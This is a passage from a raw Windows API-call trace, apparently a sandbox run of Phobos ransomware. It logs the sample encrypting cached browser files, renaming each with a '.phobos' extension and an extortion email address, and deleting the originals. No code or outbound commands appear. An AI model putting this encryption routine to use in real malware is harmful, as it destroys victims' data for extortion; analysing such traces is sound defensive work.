dwBufLen=0x150 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150) returned 1 [0189.141] CryptDestroyKey (hKey=0xa32d28) returned 1 [0189.141] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x202, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x202, lpOverlapped=0x0) returned 1 [0189.141] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0189.141] CloseHandle (hObject=0xb8) returned 1 [0189.141] CloseHandle (hObject=0x12c) returned 1 [0189.141] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=627518548[1]")) returned 1 [0189.142] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0189.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0189.146] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=4869) returned 1 [0189.146] CloseHandle (hObject=0x12c) returned 1 [0189.146] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1]")) returned 0x2020 [0189.146] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0189.147] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.147] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0189.148] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0189.148] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.148] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1305, lpOverlapped=0x0) returned 1 [0189.227] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1310, dwBufLen=0x1310 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1310) returned 1 [0189.227] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1310, lpOverlapped=0x0) returned 1 [0189.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0189.228] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.228] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150, dwBufLen=0x150 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150) returned 1 [0189.228] CryptDestroyKey (hKey=0xa32d28) returned 1 [0189.228] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x202, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x202, lpOverlapped=0x0) returned 1 [0189.228] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0189.228] CloseHandle (hObject=0x12c) returned 1 [0189.228] CloseHandle (hObject=0xb8) returned 1 [0189.228] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede12;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=1;target=_blank;aduho=600;grp=852361999[1]")) returned 1 [0189.229] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0189.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\js[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0189.230] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=961) returned 1 [0189.230] CloseHandle (hObject=0xb8) returned 1 [0189.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\js[1]")) returned 0x2020 [0189.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\js[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\js[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\js[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0189.230] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.231] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\js[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\js[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0189.231] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0189.231] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.231] ReadFile (in: hFile=0xb8, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3c1, lpOverlapped=0x0) returned 1 [0189.253] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3d0, dwBufLen=0x3d0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3d0) returned 1 [0189.253] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3d0, lpOverlapped=0x0) returned 1 [0189.254] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0189.254] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.254] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0189.254] CryptDestroyKey (hKey=0xa32d28) returned 1 [0189.254] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe2, lpOverlapped=0x0) returned 1 [0189.254] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0189.254] CloseHandle (hObject=0xb8) returned 1 [0189.254] CloseHandle (hObject=0x12c) returned 1 [0189.254] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\js[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\js[1]")) returned 1 [0189.255] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0189.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\cb=gapi[1].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\cb=gapi[1].loaded_0"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0189.256] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=117238) returned 1 [0189.257] CloseHandle (hObject=0x12c) returned 1 [0189.257] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\cb=gapi[1].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\cb=gapi[1].loaded_0")) returned 0x2020 [0189.257] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\cb=gapi[1].loaded_0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\cb=gapi[1].loaded_0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\cb=gapi[1].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\cb=gapi[1].loaded_0"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0189.257] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.257] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\cb=gapi[1].loaded_0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\cb=gapi[1].loaded_0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0189.258] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0189.258] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.258] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1c9f6, lpOverlapped=0x0) returned 1 [0189.320] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1ca00, dwBufLen=0x1ca00 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1ca00) returned 1 [0189.321] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1ca00, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1ca00, lpOverlapped=0x0) returned 1 [0189.323] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0189.323] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.323] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0189.323] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.323] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0189.323] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0189.323] CloseHandle (hObject=0x12c) returned 1 [0189.323] CloseHandle (hObject=0xb8) returned 1 [0189.323] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\cb=gapi[1].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\cb=gapi[1].loaded_0")) returned 1 [0189.325] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0189.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0189.325] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=4692) returned 1 [0189.325] CloseHandle (hObject=0xb8) returned 1 [0189.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1]")) returned 0x2020 [0189.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0189.326] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.326] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0189.327] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0189.327] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.327] ReadFile (in: hFile=0xb8, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1254, lpOverlapped=0x0) returned 1 [0189.328] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1260, dwBufLen=0x1260 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1260) returned 1 [0189.328] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1260, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1260, lpOverlapped=0x0) returned 1 [0189.329] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0189.329] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.329] CryptEncrypt (in: 